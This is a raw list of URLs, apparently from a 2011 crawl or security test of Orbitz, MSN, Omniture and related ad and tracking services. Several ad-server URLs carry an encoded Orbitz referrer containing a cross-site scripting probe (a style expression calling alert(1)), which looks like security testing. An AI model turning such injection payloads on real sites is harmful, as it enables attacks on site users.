http://www.thespanner.co.uk/feed/
http://www.tripadvisor.com/Hotel_Review-g60745-d114150-Reviews-Millennium_Bostonian_Hotel-Boston_Massachusetts.html
http://www.trw.com/
http://www.viper007bond.com/wordpress-plugins/vipers-video-quicktags/
http://www.webveteran.com/
http://www.wordpresstemplates.com/
http://a.intentmedia.net/adServer/clicks
http://a.intentmedia.net/adServer/impressions
http://a9.com/-/spec/opensearch/1.1/
http://ad-emea.doubleclick.net/click
http://ad.doubleclick.net/ad/N4492.MSN/B5014254.59
http://ad.doubleclick.net/ad/N553.126834.KONTERATECHNOLOGIES/B5039995
http://ad.doubleclick.net/adi/N3285.google/B2343920.91
http://ad.doubleclick.net/adi/N3466.8451.ORBITZLLC/B4967866.3
http://ad.doubleclick.net/adi/N4406.Orbitzcom/B5147944.4
http://ad.doubleclick.net/adi/dmd.ehow/homepage
http://ad.doubleclick.net/adj/dmd.ehow/gen
http://ad.doubleclick.net/click
http://ad.doubleclick.net/clk
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1391.0.img.TEXT/1392708374
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1391.0.img.TEXT/1496386082
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1391.0.img.TEXT/822821502
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683213**
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683295**
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683335**
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/971.560.tk.100x25/318849087
http://ad.yieldmanager.com/iframe3
http://ad.yieldmanager.com/imp
http://ad.yieldmanager.com/pixel
http://adclick.g.doubleclick.net/aclk
http://ads.adbrite.com/adserver/vdi/762701
http://ads.revsci.net/adserver/ako
https://adwords.google.com/select/Login
http://api.bizographics.com/v1/profile.json
http://b.scorecardresearch.com/b
http://blog.facebook.com/blog.php
http://blog.orbitz.com/
http://blogsearch.google.com/blogsearch
http://books.google.com/
http://books.google.com/books
http://bs.serving-sys.com/BurstingPipe/ActivityServer.bs
http://businessonmain.msn.com/browseresources/articles/firststeps.aspx
http://businessonmain.msn.com/browseresources/articles/managingemployees.aspx
http://businessonmain.msn.com/questions/default.aspx
http://businessonmain.msn.com/videos/coolrunnings.aspx
http://c.chango.com/collector/tag.js
http://c.statcounter.com/t.php
http://cdn-sitelife.ehow.com/ver1.0/Direct/DirectProxy
http://cms.ad.yieldmanager.net/v1/cms
http://code.google.com/apis/maps/terms.html
http://code.google.com/p/swfobject/
http://code.google.com/p/swfobject/wiki/documentation
http://consumershealthyliving.com/clinical-study.html
https://content.atomz.com/static/scode/H.15.1/snpall/s_code.js
http://cookex.amp.yahoo.com/v2/cexposer/SIG=13r09h5ct/*http:/ad.yieldmanager.com/imp
http://cspix.media6degrees.com/orbserv/hbpix
http://ctix8.cheaptickets.com/dcs4mzzicc2ep3maahjx8kl5c_7e2i/dcs.gif
http://ctix8.cheaptickets.com/dcsdlg96i00000clc5ljt8xox_8x1x/dcs.gif
http://ctix8.cheaptickets.com/dcsza35es100004br3bqwfzxk_6e6k/dcs.gif
http://deals.msn.com/
http://developer.yahoo.com/yui/compressor/
http://developers.facebook.com/plugins/
http://dlvr.it/Djx2v
http://dlvr.it/Djx6x
http://dm.demdex.net/pixel/10236
http://dpm.demdex.net/demdot.jpg
http://ds.addthis.com/red/psi/p.json
http://ds.addthis.com/red/psi/sites/www.ehow.com/p.json
http://edge.quantserve.com/quant.js
http://editorial.autos.msn.com/articles/default.aspx
http://editorial.autos.msn.com/blogs/autosblog.aspx
http://editorial.autos.msn.com/media/default.aspx
http://editorial.autos.msn.com/media/video/default.aspx
http://editorial.autos.msn.com/new-cars/default.aspx
http://editorial.autos.msn.com/used-cars/default.aspx
http://entertainment.msn.com/
http://entertainment.msn.com/news/
http://entertainment.msn.com/video/
http://google.com/safebrowsing/diagnostic
http://gorp.away.com/
http://goto.ext.google.com/og-dogfood-issue
http://goto.ext.google.com/og-exp
http://groups.google.com/groups
http://health.msn.com/
http://health.msn.com/health-topics/quit-smoking/articlepage.aspx
http://hit.clickaider.com/clickaider.js
http://hit.clickaider.com/pv
http://i.simpli.fi/dpx.js
http://image2.pubmatic.com/AdServer/Pug
http://images.google.com/images
http://info.yahoo.com/w3c/p3p.xml
http://jdn.monster.com/render/adserverclick.aspx
http://js.revsci.net/gateway/gw.js
http://khm0.google.com/kh/v/x3d78/x26
http://khm1.google.com/kh/v/x3d78/x26
http://khmdb0.google.com/kh
http://khmdb1.google.com/kh
http://kona32.kontera.com/KonaGet.js
http://latino.msn.com/
http://lifestyle.msn.com/
http://lifestyle.msn.com/relationships/
http://lifestyle.msn.com/relationships/staticslideshowglamour.aspx
http://lifestyle.msn.com/relationships/your-money-today/article.aspx
http://lifestyle.msn.com/your-home/cleaning-organizing/staticslideshowrs.aspx
http://lifestyle.msn.com/your-life/family-fun/staticslideshowrs.aspx
http://lifestyle.msn.com/your-life/new-year-new-you/article.aspx
http://lifestyle.msn.com/your-look/
http://lifestyle.msn.com/your-look/celebrity-style/staticslideshowmc.aspx
http://lifestyle.msn.com/your-look/everyday-style/staticslideshowglamour.aspx
http://lifestyle.msn.com/your-look/everyday-style/staticslideshowlucky.aspx
http://lifestyle.msn.com/your-look/well-groomed-male/staticslideshowgq.aspx
http://local.msn.com/
http://local.msn.com/hourly.aspx
http://local.msn.com/movies-events.aspx
http://local.msn.com/news.aspx
http://local.msn.com/restaurants.aspx
http://local.msn.com/sports.aspx
http://local.msn.com/ten-day.aspx
http://local.msn.com/weather.aspx
https://login.facebook.com/help/
https://login.facebook.com/login.php
http://login.live.com/login.srf
https://login.live.com/login.srf
https://maps-api-ssl.google.com/maps
http://media.fastclick.net/w/tre
http://millenniumhotels.122.2o7.net/b/ss/millenniumhotelstst/1/H.22.1/s34298913453239
http://millenniumhotels.122.2o7.net/b/ss/millenniumhotelstst/1/H.22.1/s34298913453239
http://movies.msn.com/
http://movies.msn.com/movies/article.aspx
http://movies.msn.com/new-on-dvd/movies/
http://movies.msn.com/paralleluniverse/5-demonic-possession-movies/story/across-the-universe/
http://movies.msn.com/paralleluniverse/henry-cavill-is-superman/story/across-the-universe/
http://movies.msn.com/paralleluniverse/in-praise-of-buried/story/across-the-universe/
http://movies.msn.com/paralleluniverse/new-sci-fi-from-alien-ashes/story/across-the-universe/
http://movies.msn.com/showtimes/showtimes.aspx
http://movies.msn.com/the-rundown/the-guard/story_5/
http://mt2.google.com/mapstt
http://mt3.google.com/mapstt
http://music.msn.com/
http://music.msn.com/music/article.aspx
http://my.msn.com/
http://my.omniture.com/
http://network.realmedia.com/RealMedia/ads/adstream_nx.ads/TRACK_Lendingtree/Retargeting_Homepage_Nonsecure@Bottom3
http://omniture.d1.sc.omtrdc.net/b/ss/omniturecom,omnitureall,omniturecomdev,omniturecomemea,omnitureapac,omniturenoncustomer,omniturecomen/1/H.19.3/s11877967668697
http://omniture.d1.sc.omtrdc.net/b/ss/omniturecom,omnitureall,omniturecomdev,omniturecomemea,omnitureapac,omniturenoncustomer,omniturecomen/1/H.19.3/s11877967668697
http://omniture.d1.sc.omtrdc.net/b/ss/omniturecom,omnitureall,omniturecomdev,omniturecomemea,omnitureapac,omniturenoncustomer,omniturecomen/1/H.19.3/s17696109912358
http://omniture.d1.sc.omtrdc.net/b/ss/omniturecom,omnitureall,omniturecomdev,omniturecomemea,omnitureapac,omniturenoncustomer,omniturecomen/1/H.19.3/s17696109912358
http://omniture.d1.sc.omtrdc.net/b/ss/omniturecom,omnitureall,omniturecomdev,omniturecomemea,omnitureapac,omniturenoncustomer,omniturecomen/1/H.19.3/s21560784257017
http://omniture.d1.sc.omtrdc.net/b/ss/omniturecom,omnitureall,omniturecomdev,omniturecomemea,omnitureapac,omniturenoncustomer,omniturecomen/1/H.19.3/s23100360115058
http://omniture.d1.sc.omtrdc.net/b/ss/omniturecom,omnitureall,omniturecomdev,omniturecomemea,omnitureapac,omniturenoncustomer,omniturecomen/1/H.19.3/s23355576898902
https://omniturebanners.112.2o7.net/b/ss/omniturebanners/1/H.9--NS/0
http://omtrdc.net/
http://onlinehelp.microsoft.com/en-us/bing/ff808490.aspx
http://onlinehelp.microsoft.com/en-us/msn/thebasics.aspx
http://orbitz.com/
http://ow.ly/1aWWoA
http://pingomatic.com/ping/
http://pix04.revsci.net/D08734/a1/0/3/0.js
http://pix04.revsci.net/F08747/b3/0/3/1003161/102504215.js
http://pix04.revsci.net/F08747/b3/0/3/1003161/1084292.js
http://pix04.revsci.net/F08747/b3/0/3/1003161/114261376.js
http://pix04.revsci.net/F08747/b3/0/3/1003161/114261376.js
http://pix04.revsci.net/F08747/b3/0/3/1003161/118073152.js
http://pix04.revsci.net/F08747/b3/0/3/1003161/118073152.js
http://pix04.revsci.net/F08747/b3/0/3/1003161/123757995.js
http://pix04.revsci.net/F08747/b3/0/3/1003161/128688612.js
http://pix04.revsci.net/F08747/b3/0/3/1003161/128688612.js
http://pix04.revsci.net/F08747/b3/0/3/1003161/129048156.js
http://pix04.revsci.net/F08747/b3/0/3/1003161/129048156.js
http://pix04.revsci.net/F08747/b3/0/3/1003161/157224151.js
http://pix04.revsci.net/F08747/b3/0/3/1003161/164892384.js
http://pix04.revsci.net/F08747/b3/0/3/1003161/213412415.js
http://pix04.revsci.net/F08747/b3/0/3/1003161/213412415.js
http://pix04.revsci.net/F08747/b3/0/3/1003161/268190583.js
http://pix04.revsci.net/F08747/b3/0/3/1003161/268190583.js
http://pix04.revsci.net/F08747/b3/0/3/1003161/310338891.js
http://pix04.revsci.net/F08747/b3/0/3/1003161/364341298.js
http://pix04.revsci.net/F08747/b3/0/3/1003161/364341298.js
http://pix04.revsci.net/F08747/b3/0/3/1003161/36740428.js
http://pix04.revsci.net/F08747/b3/0/3/1003161/36740428.js
http://pix04.revsci.net/F08747/b3/0/3/1003161/374759838.js
http://pix04.revsci.net/F08747/b3/0/3/1003161/410748832.js
http://pix04.revsci.net/F08747/b3/0/3/1003161/410748832.js
http://pix04.revsci.net/F08747/b3/0/3/1003161/449293090.js
http://pix04.revsci.net/F08747/b3/0/3/1003161/449293090.js
http://pix04.revsci.net/F08747/b3/0/3/1003161/536378960.js
http://pix04.revsci.net/F08747/b3/0/3/1003161/555347891.js
http://pix04.revsci.net/F08747/b3/0/3/1003161/555347891.js
http://pix04.revsci.net/F08747/b3/0/3/1003161/591799300.js
http://pix04.revsci.net/F08747/b3/0/3/1003161/605657366.js
http://pix04.revsci.net/F08747/b3/0/3/1003161/605657366.js
http://pix04.revsci.net/F08747/b3/0/3/1003161/664658967.js
http://pix04.revsci.net/F08747/b3/0/3/1003161/669682607.js
http://pix04.revsci.net/F08747/b3/0/3/1003161/669682607.js
http://pix04.revsci.net/F08747/b3/0/3/1003161/686809393.js
http://pix04.revsci.net/F08747/b3/0/3/1003161/686809393.js
http://pix04.revsci.net/F08747/b3/0/3/1003161/70794208.js
http://pix04.revsci.net/F08747/b3/0/3/1003161/715159401.js
http://pix04.revsci.net/F08747/b3/0/3/1003161/72215668.js
http://pix04.revsci.net/F08747/b3/0/3/1003161/725558049.js
http://pix04.revsci.net/F08747/b3/0/3/1003161/725558049.js
http://pix04.revsci.net/F08747/b3/0/3/1003161/737191144.js
http://pix04.revsci.net/F08747/b3/0/3/1003161/769036262.js
http://pix04.revsci.net/F08747/b3/0/3/1003161/814275397.js
http://pix04.revsci.net/F08747/b3/0/3/1003161/844309645.js
http://pix04.revsci.net/F08747/b3/0/3/1003161/868788633.js
http://pix04.revsci.net/F08747/b3/0/3/1003161/869604030.js
http://pix04.revsci.net/F08747/b3/0/3/1003161/887063996.js
http://pix04.revsci.net/F08747/b3/0/3/1003161/934643839.js
http://pixel.invitemedia.com/data_sync
http://pixel.mathtag.com/event/js
http://pixel.quantserve.com/pixel/p-78V15bIOxaPIs.gif
http://price.orbitz.com/
http://px.admonkey.dapper.net/PixelMonkey
http://r.casalemedia.com/j.gif
http://r.openx.net/set
http://r1-ads.ace.advertising.com/click/site=0000747145/mnum=0000961923/cstr=11479363=_4d48254a,7376408871,747145^961923^1183^0,1_/xsxdata=$xsxdata/bnum=11479363&siteValue=0000747145&city=Dallas/
http://r1-ads.ace.advertising.com/click/site=0000747145/mnum=0000961923/cstr=25807272=_4d482560,1483511146,747145^961923^1183^0,1_/xsxdata=$xsxdata/bnum=25807272&siteValue=0000747145&city=Dallas/
http://r1-ads.ace.advertising.com/click/site=0000749715/mnum=0000918410/bnum=29104868/cstr=29104868=_4d482547,0572256108,749715^918410^1183^0,1_/xsxdata=$xsxdata/xsinvid=0/imptid=AScb47c603bd494ad09cac82f8e21e47bc
http://r1-ads.ace.advertising.com/click/site=0000749715/mnum=0000964772/bnum=10533267/cstr=10533267=_4d48255e,5052657456,749715^964772^1183^0,1_/xsxdata=$xsxdata/xsinvid=0/imptid=ASda8e1ea7652d4c0992c679c6d2b63588
http://r1-ads.ace.advertising.com/site=747145/size=300250/u=2/bnum=11479363/hr=9/hl=2/c=3/scres=5/swh=1920x1200/tile=2/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.orbitz.com%252FApp%252FPerformMDLPDealsContent%253Fdeal_id%253Dpromotions%2526cnt%253DPRO%2526type%253Doa_qs35daf%252522style%25253d%252522x%25253aexpression%2528alert%25281%2529%2529%2525221333ba1041f
http://r1-ads.ace.advertising.com/site=747145/size=300250/u=2/bnum=25807272/hr=9/hl=1/c=2/scres=5/swh=1920x1200/tile=2/f=0/r=1/optn=1/fv=0/aolexp=1/dref=http%253A%252F%252Fwww.orbitz.com%252FApp%252FPerformMDLPDealsContent%253Fdeal_id%253Dpromotions%2526cnt%253DPRO%2526type%253Doa_qs35daf%252522style%25253d%252522x%253Aexpression%2528alert%25281%2529%2529%2525221333ba1041f
http://r1-ads.ace.advertising.com/site=749715/size=160600/u=2/bnum=10533267/hr=9/hl=1/c=2/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=0/aolexp=1/dref=http%253A%252F%252Fwww.orbitz.com%252FApp%252FPerformMDLPDealsContent%253Fdeal_id%253Dpromotions%2526cnt%253DPRO%2526type%253Doa_qs35daf%252522style%25253d%252522x%253Aexpression%2528alert%25281%2529%2529%2525221333ba1041f
http://r1-ads.ace.advertising.com/site=749715/size=160600/u=2/bnum=29104868/hr=9/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.orbitz.com%252FApp%252FPerformMDLPDealsContent%253Fdeal_id%253Dpromotions%2526cnt%253DPRO%2526type%253Doa_qs35daf%252522style%25253d%252522x%25253aexpression%2528alert%25281%2529%2529%2525221333ba1041f
http://realestate.msn.com/
http://realestate.msn.com/slideshow.aspx
http://sales.liveperson.net/hc/15744040/
http://sales.liveperson.net/hc/15744040/
http://scholar.google.com/scholar
http://scripts.omniture.com/global/scripts/targeting/dyn_prop.php
http://search.aol.com/%20%20%20%20%20%20%20%20%20%20%20%20%201','','0C
http://segment-pixel.invitemedia.com/set_partner_uid
http://segment-pixel.invitemedia.com/setuid
http://showads.pubmatic.com/AdServer/AdServerServlet
http://showads.pubmatic.com/AdServer/AdServerServlet
http://showads.pubmatic.com/AdServer/AdServerServlet
http://showads.pubmatic.com/AdServer/AdServerServlet
http://showads.pubmatic.com/AdServer/AdServerServlet
http://showads.pubmatic.com/AdServer/AdServerServlet
http://showads.pubmatic.com/AdServer/AdServerServlet
http://showads.pubmatic.com/AdServer/AdServerServlet
http://sitelife.ehow.com/ver1.0/Direct/Process
https://sitesearch.omniture.com/center/
http://social.entertainment.msn.com/bloglist.aspx
http://social.entertainment.msn.com/movies/blogs/the-hitlist-blog.aspx
http://social.entertainment.msn.com/tv/blogs/reality-tv-blog.aspx
http://sorry.google.com/sorry/
http://sorry.google.com/sorry/Captcha
http://specials.msn.com/A-List/Entertainment/Ali-Larters-baby-story.aspx
http://specials.msn.com/A-List/Entertainment/Britney-Spears-as-maid-of-honor.aspx
http://specials.msn.com/A-List/Entertainment/Famous-young-fashionistas.aspx
http://specials.msn.com/A-List/Entertainment/Hip-hop-pioneer-hospitalized.aspx
http://specials.msn.com/A-List/Entertainment/Javier-Bardem-as-Bond.aspx
http://specials.msn.com/A-List/Entertainment/Most-wanted-celebrity-body-parts.aspx
http://specials.msn.com/A-List/Entertainment/New-Superman-chosen.aspx
http://specials.msn.com/A-List/Entertainment/Ozzy-cancels-Reno-show.aspx
http://specials.msn.com/A-List/Lifestyle/African-American-History.aspx
http://specials.msn.com/A-List/Lifestyle/Best-home-remedies.aspx
http://specials.msn.com/A-List/Lifestyle/January-2011-quotes-of-the-month.aspx
http://specials.msn.com/A-List/Lifestyle/Man-jailed-for-defecating-in-store.aspx
http://specials.msn.com/A-List/Lifestyle/Monk-charged-under-anti-smoking-law.aspx
http://specials.msn.com/A-List/Lifestyle/No-bail-for-mom-who-killed-kids.aspx
http://specials.msn.com/A-List/Lifestyle/Police-break-up-fight-at-N.C.-church.aspx
http://specials.msn.com/A-List/Lifestyle/Sled-dogs-slaughtered.aspx
http://specials.msn.com/A-List/Lifestyle/Teens-arrested-in-kidnapping-assault.aspx
http://specials.msn.com/IEIncreaseFont_preview.aspx
http://specials.msn.com/alphabet.aspx
http://sync.mathtag.com/sync/img
http://t.invitemedia.com/track_imp
http://tags.bluekai.com/site/1463
http://tags.bluekai.com/site/2748
http://track.roiservice.com/track/LogToDb.asp.aspx
http://track.roiservice.com/track/track.aspx
http://tracking.tree.com/trk/npv-event.gif
http://tracking.tree.com/trk/pv.gif
http://translate.google.com/translate_t
http://tv.msn.com/
http://tv.msn.com/last-night-on-tv/
http://tv.msn.com/tv/article.aspx
http://video.google.com/videosearch
http://vs.dmtracker.com/tags/vs.js
http://w.ic.tynt.com/b/o
http://wp-superslider.com/
http://wp-superslider.com/index.php
http://www.addthis.com/bookmark.php
http://www.astaro.org/
http://www.away.com/
http://www.bing.com/
http://www.bing.com/images/results.aspx
http://www.bing.com/local/ypdefault.aspx
http://www.bing.com/maps/
http://www.bing.com/maps/default.aspx
http://www.bing.com/maps/explore/
http://www.bing.com/news/results.aspx
http://www.bing.com/news/search
http://www.bing.com/news/search
http://www.bing.com/results.aspx
http://www.bing.com/search
http://www.bing.com/shopping
http://www.bing.com/shopping/pet-beds/c/5533
http://www.bing.com/shopping/photo-storage-presentation/search
http://www.bing.com/shopping/search
http://www.bing.com/shopping/televisions/c/4724
http://www.bing.com/shopping/valentines-day-gift-ideas/r/144
http://www.bing.com/shopping/womens-workout-clothing/r/146
http://www.bing.com/travel/deals/cheap-flights-to-las-vegas.do
http://www.bing.com/travel/destinations/orlando-florida-hotels-hostels-motels-1004643
http://www.bing.com/travel/hotels
http://www.bing.com/videos/browse
http://www.bing.com/videos/results.aspx
http://www.bing.com/videos/watch/video/earthquake-proof-bridge/pfu8x7j
http://www.bing.com/videos/watch/video/ice-cube-talks-tv-film-and-music/6vztnpj
http://www.bing.com/videos/watch/video/jay-mohr-part-1/17wj9ueo7
http://www.bing.com/videos/watch/video/rio-exclusive-films-first-two-minutes/5eq4owv
http://www.bing.com/videos/watch/video/the-roommate-exclusive-clip-just-doing-my-job/5tbba1k
http://www.capitalone.com/creditcards/orbitz/index.php
http://www.cheaptickets.com/
http://www.demandstudios.com/ehow-writers.html
http://www.digitalia.be/
http://www.ehow.com/
http://www.evow.com/
http://www.facebook.com/
http://www.facebook.com/btaylor
http://www.facebook.com/careers/
http://www.facebook.com/directory/pages/
http://www.facebook.com/directory/people/
http://www.facebook.com/help/
http://www.facebook.com/ligatt
http://www.facebook.com/privacy/explanation.php
https://www.facebook.com/login.php
http://www.google.com/finance
http://www.google.com/setprefs
https://www.google.com/accounts/Login
http://www.lodging.com/
http://www.msn.com/
http://www.omniture.com/
http://www.omniture.com/de
http://www.omniture.com/en
http://www.omniture.com/en/
http://www.omniture.com/en/community
http://www.omniture.com/en/community/blogs
http://www.omniture.com/en/community/events
http://www.omniture.com/en/community/usergroups
http://www.omniture.com/en/company/adobe_faq
http://www.omniture.com/en/company/analyst_insight
http://www.omniture.com/en/company/customers
http://www.omniture.com/en/company/press_room
http://www.omniture.com/en/company/press_room/awards
http://www.omniture.com/en/company/press_room/news
http://www.omniture.com/en/company/press_room/press_releases
http://www.omniture.com/en/contact
http://www.omniture.com/en/contact/company
http://www.omniture.com/en/contact/email
http://www.omniture.com/en/contact/feedback
http://www.omniture.com/en/contact/offices
http://www.omniture.com/en/contact/sales
http://www.omniture.com/en/contact/support
http://www.omniture.com/en/education
http://www.omniture.com/en/education/academic_initiative
http://www.omniture.com/en/education/certification
http://www.omniture.com/en/education/certification/implementation
http://www.omniture.com/en/education/certification/insight_analyst
http://www.omniture.com/en/education/certification/insight_architect
http://www.omniture.com/en/education/certification/search_center
http://www.omniture.com/en/education/certification/site_catalyst
http://www.omniture.com/en/education/certification/support
http://www.omniture.com/en/education/certification/test_target
http://www.omniture.com/en/education/courses
http://www.omniture.com/en/education/courses/discover
http://www.omniture.com/en/education/courses/dop_analyst
http://www.omniture.com/en/education/courses/merchandising
http://www.omniture.com/en/education/courses/online_marketing_suite
http://www.omniture.com/en/education/courses/sbu
http://www.omniture.com/en/education/courses/searchcenter
http://www.omniture.com/en/education/courses/sitesearch
http://www.omniture.com/en/education/courses/survey
http://www.omniture.com/en/education/courses/testandtarget
http://www.omniture.com/en/partners
http://www.omniture.com/en/partners/apply
http://www.omniture.com/en/partners/portal
http://www.omniture.com/en/partners/showcase
http://www.omniture.com/en/privacy
http://www.omniture.com/en/privacy/2o7
http://www.omniture.com/en/privacy/policy
http://www.omniture.com/en/privacy/product
http://www.omniture.com/en/privacy/visualsciences
http://www.omniture.com/en/privacy/visualsciences/policy
http://www.omniture.com/en/privacy/visualsciences/resources
http://www.omniture.com/en/privacy/visualsciences/terms
http://www.omniture.com/en/product_tours/form
http://www.omniture.com/en/products/conversion
http://www.omniture.com/en/products/conversion/merchandising
http://www.omniture.com/en/products/conversion/publish
http://www.omniture.com/en/products/conversion/recommendations
http://www.omniture.com/en/products/conversion/searchandpromote
http://www.omniture.com/en/products/conversion/survey
http://www.omniture.com/en/products/conversion/testandtarget
http://www.omniture.com/en/products/conversion/testandtarget11
http://www.omniture.com/en/products/marketing_integration/closed_loop_marketing
http://www.omniture.com/en/products/marketing_integration/genesis
http://www.omniture.com/en/products/marketing_integration/genesis/applications
http://www.omniture.com/en/products/multichannel_analytics
http://www.omniture.com/en/products/multichannel_analytics/insight
http://www.omniture.com/en/products/multichannel_analytics/insight_retail
http://www.omniture.com/en/products/online_analytics
http://www.omniture.com/en/products/online_analytics/digitalpulse
http://www.omniture.com/en/products/online_analytics/discover
http://www.omniture.com/en/products/online_analytics/sitecatalyst
http://www.omniture.com/en/products/online_business_optimization
http://www.omniture.com/en/products/online_marketing_suite
http://www.omniture.com/en/products/open_business_analytics_platform
http://www.omniture.com/en/products/open_business_analytics_platform/datawarehouse
http://www.omniture.com/en/products/tours
http://www.omniture.com/en/products/visitor_acquisition
http://www.omniture.com/en/products/visitor_acquisition/searchcenter
http://www.omniture.com/en/resources
http://www.omniture.com/en/resources/articles
http://www.omniture.com/en/resources/case_studies
http://www.omniture.com/en/resources/cmo.com
http://www.omniture.com/en/resources/guides
http://www.omniture.com/en/resources/testimonials
http://www.omniture.com/en/resources/webinars
http://www.omniture.com/en/services
http://www.omniture.com/en/services/consulting
http://www.omniture.com/en/services/es
http://www.omniture.com/en/survey/5084
http://www.omniture.com/en/surveys
http://www.omniture.com/es
http://www.omniture.com/fr
http://www.omniture.com/jp
http://www.omniture.com/ko
http://www.omniture.com/offer/100
http://www.omniture.com/offer/101
http://www.omniture.com/offer/102
http://www.omniture.com/offer/107
http://www.omniture.com/offer/108
http://www.omniture.com/offer/158
http://www.omniture.com/offer/162
http://www.omniture.com/offer/17
http://www.omniture.com/offer/170
http://www.omniture.com/offer/186
http://www.omniture.com/offer/187
http://www.omniture.com/offer/191
http://www.omniture.com/offer/285
http://www.omniture.com/offer/286
http://www.omniture.com/offer/291
http://www.omniture.com/offer/301
http://www.omniture.com/offer/303
http://www.omniture.com/offer/323
http://www.omniture.com/offer/331
http://www.omniture.com/offer/335
http://www.omniture.com/offer/337
http://www.omniture.com/offer/357
http://www.omniture.com/offer/372
http://www.omniture.com/offer/400
http://www.omniture.com/offer/411
http://www.omniture.com/offer/412
http://www.omniture.com/offer/413
http://www.omniture.com/offer/427
http://www.omniture.com/offer/429
http://www.omniture.com/offer/435
http://www.omniture.com/offer/462
http://www.omniture.com/offer/704
http://www.omniture.com/offer/892
http://www.omniture.com/offer/987
http://www.omniture.com/offer/989
http://www.omniture.com/press/867
http://www.omniture.com/press/868
http://www.omniture.com/privacy/2o7
http://www.omniture.com/zh
http://www.orbitz.com/
http://www.orbitz.com/App/DPTLandingPageSearch
http://www.orbitz.com/App/DisplayCarSearch
http://www.orbitz.com/App/GDDC
http://www.orbitz.com/App/Home
http://www.orbitz.com/App/InitDealEdit
http://www.orbitz.com/App/PartnerTracking
http://www.orbitz.com/App/PerformMDLPDealsContent
http://www.orbitz.com/App/PrepareActivitiesHome
http://www.orbitz.com/App/PrepareDealsHome
http://www.orbitz.com/App/PrepareFlightsTab
http://www.orbitz.com/App/PrepareFlightsTab&type=el_dp
http://www.orbitz.com/App/PrepareSearchResult
http://www.orbitz.com/App/PrepareVacationsHome
http://www.orbitz.com/App/Sitemap
http://www.orbitz.com/App/SubmitQuickSearch
http://www.orbitz.com/App/ViewDHTMLCalendar
http://www.orbitz.com/App/ViewHotelSearch
http://www.orbitz.com/App/ViewMyAccount
http://www.orbitz.com/App/ViewRSSHelpPage
http://www.orbitz.com/App/ViewRoundTripSearch
http://www.orbitz.com/App/ViewTravelWatchHome
http://www.orbitz.com/Secure/DelayedRegistration
http://www.orbitz.com/Secure/DelayedSignIn
http://www.orbitz.com/Secure/PerformDisplayMyTrips
http://www.orbitz.com/Secure/PrepareMemberPreferences
http://www.orbitz.com/Secure/SignOut
http://www.orbitz.com/Secure/ViewNewMemberReg
http://www.orbitz.com/Secure/ViewSetupCareAlertsProfile
http://www.orbitz.com/cacheable/ad.html
http://www.orbitz.com/cacheable/ad_empty.html
http://www.orbitz.com/cacheable/empty.html
http://www.orbitz.com/content/www/orb/rss/flightdeals.rss.xml
http://www.orbitz.com/pagedef/content/legal/bestPriceGuarantee.jsp
http://www.orbitz.com/public/ANS/Orbitz/html/PackageSave30_012411.xml
http://www.orbitz.com/shared/adserverProxy.jsp
http://www.orbitz.com/shared/css/DPTLiteDetails.css.jsp
http://www.orbitz.com/shared/css/calendar.css.jsp
http://www.orbitz.com/shared/css/dealsOrbot.css.jsp
http://www.orbitz.com/shared/css/dialog.css.jsp
http://www.orbitz.com/shared/css/global.css.jsp
http://www.orbitz.com/shared/css/homepage.css.jsp
http://www.orbitz.com/shared/js/behaviors.js
http://www.orbitz.com/shared/js/bot.js
http://www.orbitz.com/shared/js/cookie.js
http://www.orbitz.com/shared/js/deals.js
http://www.orbitz.com/shared/js/destinationDetails.js
http://www.orbitz.com/shared/js/global.js
http://www.orbitz.com/shared/js/lib/dialog.js
http://www.orbitz.com/shared/js/lib/prototype.js
http://www.orbitz.com/shared/js/lib/prototypeExtensions.js
http://www.orbitz.com/shared/js/lib/scriptaculous/src/builder.js
http://www.orbitz.com/shared/js/lib/scriptaculous/src/controls.js
http://www.orbitz.com/shared/js/lib/scriptaculous/src/dragdrop.js
http://www.orbitz.com/shared/js/lib/scriptaculous/src/effects.js
http://www.orbitz.com/shared/js/lib/scriptaculous/src/scriptaculous.js
http://www.orbitz.com/shared/js/lib/scriptaculous/src/slider.js
http://www.orbitz.com/shared/js/lib/scriptaculous/src/sound.js
http://www.orbitz.com/shared/js/tracking/webtrends.js
http://www.orbitz.com/shared/js/vendor/tealeaf.js
http://www.orbitz.com/shared/pagedef/content/air/max_passenger_popup.jsp
http://www.orbitz.com/shared/pagedef/content/dp/twoOrMoreRoomsPopup.jsp
http://www.orbitz.com/shared/pagedef/content/legal/lowFarePromise.jsp
http://www.orbitz.com/shop/hotelsearch
http://www.orbitz.com/site/js/jsAllTeaLeaf.js
http://www.orbitz.com/tealeaf.jsp
http://www.orbitz.com/tealeaf.jsp
https://www.orbitz.com/App/PartnerTracking
https://www.orbitz.com/App/ViewMyAccount
https://www.orbitz.com/Secure/SignIn
https://www.orbitz.com/Secure/ViewSecureCalendar
https://www.orbitz.com/Secure/ViewSetupCareAlertsProfile
http://www.orbitzforagents.com/
http://www.owasp.org/index.php/XSS_(Cross_Site_Scripting
http://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet
http://www.parentsconnect.com/eat/index.jhtml
http://www.revresda.com/html.ng/channel=home&Section=main&adsize=519x225&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296573746089&dsrc=7&height=225&rotator=true&width=519&adType=script&
http://www.revresda.com/html.ng/channel=home&Section=main&adsize=hometext1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296573746089&dsrc=7&
http://www.revresda.com/html.ng/channel=home&Section=main&adsize=hometext2&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296573746089&dsrc=7&
